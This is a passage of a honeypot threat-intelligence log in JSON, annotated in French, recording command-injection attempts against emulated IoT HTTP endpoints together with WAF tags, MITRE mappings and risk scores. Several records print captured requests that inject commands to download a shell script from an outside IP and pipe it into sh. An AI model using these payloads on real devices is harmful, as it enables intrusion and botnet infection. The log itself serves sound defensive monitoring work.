\u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 54, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/downloadFlile.cgi\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/downloadFlile.cgi\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;busybox wget http:\/\/91.92.40.118\/w\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 60 \u00b7 2 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":7,"bytes_in":251},{"id":11809691,"ip":"45.153.34.252","ts":"2026-07-14 02:29:44.000000","proto":"tcp","src_port":38196,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":19,"waf_tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/cgi-bin\/luci?cmd=`cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00224c1d6030a986266ba5ba71a1277a20bbc2d8d480\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 240, \u0022payload_entropy\u0022: 5.061771432238714, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 84.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 84.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 61, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00223823ca5da22462a00353275057adafb8590346ea\u0022, \u0022event_fingerprint\u0022: \u002292af9d0ca44188723eb7ddc02b59b2c45c4da0ea\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 514, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022, \u0022pat-0245\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932190\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022CRS 932206\u0022, \u0022LFI Double-dot bypass\u0022, \u0022Probe \/cgi-bin\/luci\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022, \u0022pat-0245\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 84.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 61}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022e18d75c1fc86682b19f1b922d9e6360e\u0022, \u0022path_pattern_hash\u0022: \u0022433e044dd5893c3ac149081d90651f83\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 61}, \u0022payload_preview\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/luci\u0022, \u0022query_string\u0022: \u0022cmd=`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;curl http:\/\/91.92.40.118\/wget.sh|sh -s tuoshi` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/luci\u0022, \u0022query_string\u0022: \u0022cmd=`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;curl http:\/\/91.92.40.118\/wget.sh|sh -s tuoshi` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022bcdc91166372eca7f7d345f5d3ee8aae92b6256a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/luci\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/luci\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 61\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 84.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 61}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 61, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/luci\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/luci\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s tuoshi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 84 \u00b7 3 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":9,"bytes_in":240},{"id":11809687,"ip":"45.153.34.252","ts":"2026-07-14 02:29:43.000000","proto":"tcp","src_port":38186,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":13,"waf_tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022]","http_method":"GET","http_target":"\/Security\/auditLog\/search?logTime=0;`cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022e4d882982425293a1fec5646ad9c8e8237e11fe0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 252, \u0022payload_entropy\u0022: 5.187027861434996, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 60.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 15.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 4.8, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 15.0}, \u0022risk_score\u0022: 54, \u0022tag_count\u0022: 4, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022e3bc3154d7268828ac1b65fa0908b5b346a337a1\u0022, \u0022event_fingerprint\u0022: \u00228908b3c6b88ef275ba43d754980485c237b3a81a\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 514, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932190\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022CRS 932206\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 54}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224ed11baec0d13895f05143d398c8140b\u0022, \u0022path_pattern_hash\u0022: \u0022b30061e72d047d96ba099ac8376cce65\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 54}, \u0022payload_preview\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;busybox wget http:\/\/91.92.40.11\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/Security\/auditLog\/search\u0022, \u0022query_string\u0022: \u0022logTime=0;`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;curl http:\/\/91.92.40.118\/wget.sh|sh -s hik3` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;busybox wget http:\/\/91.92.40.11\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/Security\/auditLog\/search\u0022, \u0022query_string\u0022: \u0022logTime=0;`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;curl http:\/\/91.92.40.118\/wget.sh|sh -s hik3` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;busybox wget http:\/\/91.92.40.11\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], 